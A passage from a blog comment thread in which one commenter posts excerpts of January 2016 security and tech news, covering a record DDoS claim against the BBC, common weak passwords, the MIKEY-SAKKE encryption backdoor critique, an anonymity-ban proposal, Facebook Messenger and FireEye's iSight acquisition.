    Intel is leading the way with a new kind of multifactor authentication where PCs are an integral part of the solution. Intel® Authenticate Technology on the 6th generation Intel® Core™ vPro™ processor is a multifactor authentication solution that strengthens identity protection for the enterprise. It supports combining a variety of hardware-enhanced factors at the same time to validate a user’s identity, including ‘something you know’ (such as a PIN); ‘something you have’ (such as a mobile phone); and ‘something you are’ (such as a fingerprint). You can tailor the combination of hardened identity factors based on what works best for your business.

    With Intel Authenticate Technology, PIN, biometrics, keys, tokens and associated certificates are captured, encrypted, matched, and stored in the hardware, out of sight and reach from typical attack methods.

    Identity Protection That Works for IT

    Intel Authenticate Technology enables flexible policy configuration and enforcement using familiar PC management features and centralized tools. Policy administration, application distribution, and related fleet management all operate per your usual business processes.

    Reply
45. January 20, 2016 at 9:55 pm

    Tomi Engdahl says:

    602 Gbps! This May Have Been the Largest DDoS Attack in History
    Friday, January 08, 2016 Swati Khandelwal
    http://thehackernews.com/2016/01/biggest-ddos-attack.html?m=1

    Cyber attacks are getting evil and worst nightmare for companies day-by-day, and the Distributed Denial of Service (DDoS) attack is one of the favorite weapon for hackers to temporarily suspend services of a host connected to the Internet.

    Until now, nearly every big website had been a victim of this attack, and the most recent one was conducted against the BBC’s websites and Republican presidential candidate Donald Trump’s main campaign website over this past holiday weekend.

    Out of two, the largest DDoS attack in the history was carried out against the BBC website: Over 600 Gbps.

    The group calling itself New World Hacking claimed responsibility for taking down both the BBC’s global website and Donald Trump’s website

    “New World Hacking” group had claimed responsibility for launching a DDoS attack against BBC, as a “test of its capabilities.”

    One of the members of the New World Hacking group, identified himself as Ownz, claimed that the group allegedly used their own tool called BangStresser to launch a DDoS attack of up to 602 Gbps on the BBC’s website.

    As a proof, the group provided ZDNet a screenshot of a web interface that was allegedly used to attack the BBC website.

    Although the authenticity of the screenshot has not been verified, if the attack size is proven true, it would vastly surpass the largest DDoS attack record of 334 Gbps, recorded by Arbor Networks last year.

    The recent massive DDoS attack apparently utilizes two Amazon Web Services servers that employ a large number of automated detection and mitigation techniques in order to prevent the misuse of the services, Amazon previously claimed.

    “We have our ways of bypassing Amazon,” said Ownz. “The best way to describe it is we tap into a few administrative services that Amazon is use to using. The [sic] simply set our bandwidth limit as unlimited and program our own scripts to hide it.”

    More details about the attack have yet not disclosed, but Ownz claimed that their main purpose behind the development of the BangStresser DDoS tool is to unmask ISIS and possibly end its online propaganda.

    Reply
46. January 20, 2016 at 10:56 pm

    Tomi Engdahl says:

    It’s 2016 and idiots still use ’123456′ as their password
    Just think how many of this lot are your own users…
    http://www.theregister.co.uk/2016/01/20/leaked_passwords_hopelessly_lame/

    Put your head in your hands, sysadmins: the usual weak suspects continue to make up the top most used 25 passwords.

    The ubiquitous ”123456″ remains the most popular password among web users, followed by “password” in a list of user credentials leaked online last year.

    “Qwerty” appears in fourth place of the list of compromised credentials put together by password management outfit SplashData.

    Further down the list “dragon”, “football” and “batman” all make their debuts as new entries.

    Security experts warn that easy to remember passwords are increased easily guessed by potential attackers.

    Matt Marx, an information security consultant at MWR InfoSecurity, said: “In order to crack users’ passwords, researchers and attackers alike use powerful GPU password cracking rigs. The rig that MWR uses can perform over 20 billion guesses a second against Microsoft Windows password hashes. In fact, a user that had a password in the top 25 passwords would have their password guessed by such a rig in under a second.”

    Web users need to mix things up.

    Reply
47. January 20, 2016 at 10:59 pm

    Tomi Engdahl says:

    Senior Homeland Security Official Says Internet Anonymity Should Be Outlawed
    http://yro.slashdot.org/story/16/01/20/1321243/senior-homeland-security-official-says-internet-anonymity-should-be-outlawed

    A senior Homeland Security official recently argued that Internet anonymity should outlawed in the same way that driving a car without a license plate is against the law. “When a person drives a car on a highway, he or she agrees to display a license plate,” Erik Barnett, an assistant deputy director at U.S. Immigration and Customs Enforcement and attache to the European Union at the Department of Homeland Security, wrote.

    Politics
    Senior Homeland Security official says Internet anonymity should be outlawed
    http://www.dailydot.com/politics/anonymity-homeland-security-erik-barnett/

    A senior Homeland Security official recently argued that Internet anonymity should outlawed in the same way that driving a car without a license plate is against the law.

    Erik Barnett, an assistant deputy director at U.S. Immigration and Customs Enforcement and attache to the European Union at the Department of Homeland Security, outlined his argument in an article titled “Whose Privacy Are We Protecting? Balancing Rights to Anonymity with Rights to Public Safety,” published in FIC Observatory, a French publication dedicated to debates about cybersecurity.

    “When a person drives a car on a highway, he or she agrees to display a license plate,” Barnett wrote. “The license plate’s identifiers are ignored most of the time by law enforcement. Law enforcement will use the identifiers, though, to determine the driver’s identity if the car is involved in a legal infraction or otherwise becomes a matter of public interest. Similarly, should not every individual be required to display a ‘license plate’ on the digital super-highway?”

    The suggestion yielded backlash quickly. Nate Cardozo, a staff attorney at the Electronic Frontier Foundation, called the idea “plainly unconstitutional.”

    Barnett’s essay didn’t offer much in the way of specifics. Instead, he asked a number of provocative questions.

    Reply
48. January 20, 2016 at 11:02 pm

    Tomi Engdahl says:

    For fsck’s SAKKE: GCHQ-built phone voice encryption has massive backdoor – researcher
    Well, what did you expect?
    http://www.theregister.co.uk/2016/01/19/key_voice_encryption_protocol_has_backdoor/

    The UK government’s official voice encryption protocol, around which it is hoping to build an ecosystem of products, has a massive backdoor that would enable the security services to intercept and listen to all past and present calls, a researcher has discovered.

    Dr Steven Murdoch of University College London has posted an extensive blog post digging into the MIKEY-SAKKE spec in which he concludes that it has been specifically designed to “allow undetectable and unauditable mass surveillance.”

    He notes that in the “vast majority of cases” the protocol would be “actively harmful for security.”

    Murdoch uses the EFF’s scorecard as a way of measuring the security of MIKEY-SAKKE, and concludes that it only manages to meet one of the four key elements for protocol design, namely that it provides end-to-end encryption.

    However, due to the way that the system creates and shares encryption keys, the design would enable a telecom provider to insert themselves as a man-in-the-middle without users at either end being aware. The system would also allow a third party to unencrypt past and future conversations. And it does not allow for people to be anonymous or to verify the identity of the person they are talking to.

    In other words, it would be the perfect model for the security services

    The CESG – and the UK’s civil service – started pushing the approach late last year and has incorporated it into a product spec called Secure Chorus.

    There is increasing demand for voicecall encryption. Unlike instant messaging, which effectively allowed companies to start from scratch and so has resulted in a number of highly secure products, phonecalls run over older infrastructure and almost always pass through telecom companies, usually in an unencrypted form (although the information may be encrypted while in transit).

    MIKEY-SAKKE is unusual in that unlike most secure messaging and phone systems, it makes no effort at all to protect the identity of the people communicating with one another, providing easy-to-access maps of metadata.

    If at first you don’t succeed

    He also notes that GCHQ tried 20 years ago to introduce a similar protocol but that a “notable difference” exists between that effort and this MIKEY-SAKKE approach: “While the GCHQ protocol was explicitly stated to support key escrow to facilitate law enforcement and intelligence agency access, this controversial aspect has not been included in the description of MIKEY-SAKKE and instead the efficiency over EDH is emphasised.”

    Or in other words, the UK government doesn’t want you to know that it can spy on everything you say.

    Reply
49. January 20, 2016 at 11:04 pm

    Tomi Engdahl says:

    Facebook Messenger: All your numbers are belong to us
    The (social) world is not enough, for Zuckerberg
    http://www.theregister.co.uk/2016/01/20/facebook_messenger_has_designs_on_mobile_world/

    Facebook started 2016 with the bold claim that it intends to eradicate phone numbers and replace web browsing, but the Social Network has a mountain to climb before Facebook Messenger becomes the centre of our online world.

    That’s the stated intention of the Zuckerberg empire – to replace all our myriad internet communication systems with one interface.

    Facebook claims that its Messenger app has been installed 800 million times

    If Facebook is going to recruit the shops, taxi companies and airlines it needs to make Messenger a one-stop internet shop it will need to get the app installed across the demographics before Microsoft (with Skype) steps in to take the cream.

    The medium is the Messenger

    With that in mind, Facebook Messenger was forked from the main Facebook mobile app back in 2011, but messaging remained possible in the main app until 2014. These days, the Facebook app will notify you that a message has been received, but if you want to read that message then you’ll have to download and install Facebook’s new Trojan Horse.

    Every month, 600 million Chinese are using Weixen, Tencent’s WeChat client, to book taxis, check into flights, play games, buy cinema tickets, make doctors’ appointments, and even manage bank accounts, all without touching the web browser.

    In China, messaging has become the platform of choice for accessing a wide variety of services, and Facebook plans to replicate that model in the rest of the world – with it owning the messaging platform, obviously.

    Reply
50. January 21, 2016 at 8:28 am

    Tomi Engdahl says:

    Reuters:
    FireEye buys cyber intelligence firm iSight Partners for $200 million
    http://www.reuters.com/article/us-isight-fireeye-m-a-idUSKCN0UY2OU?feedType=RSS&feedName=technologyNews

    FireEye Inc said on Wednesday it paid $200 million to buy privately held iSight Partners in a move to boost its cyber intelligence offerings for governments and businesses as the sector consolidates.

    The deal brings together two of the world’s most prominent cyber firms: FireEye’s Mandiant forensics unit is a leader in helping companies investigate cyber attacks, while iSight has uncovered major cyber campaigns from Iran, Russia and other nations.

    It follows a steep decline in valuations of public and private cyber security firms, which some investors consider too richly valued after a series of high-profile cyber attacks on the U.S. government, Sony Corp and Target Corp spurred interest in the sector.

    Watters told Reuters in an interview that he decided to sell after the market for funding became more difficult.

    “If big companies come along to acquire us and they give us a great payout, you’ve got to consider it.”

    Reply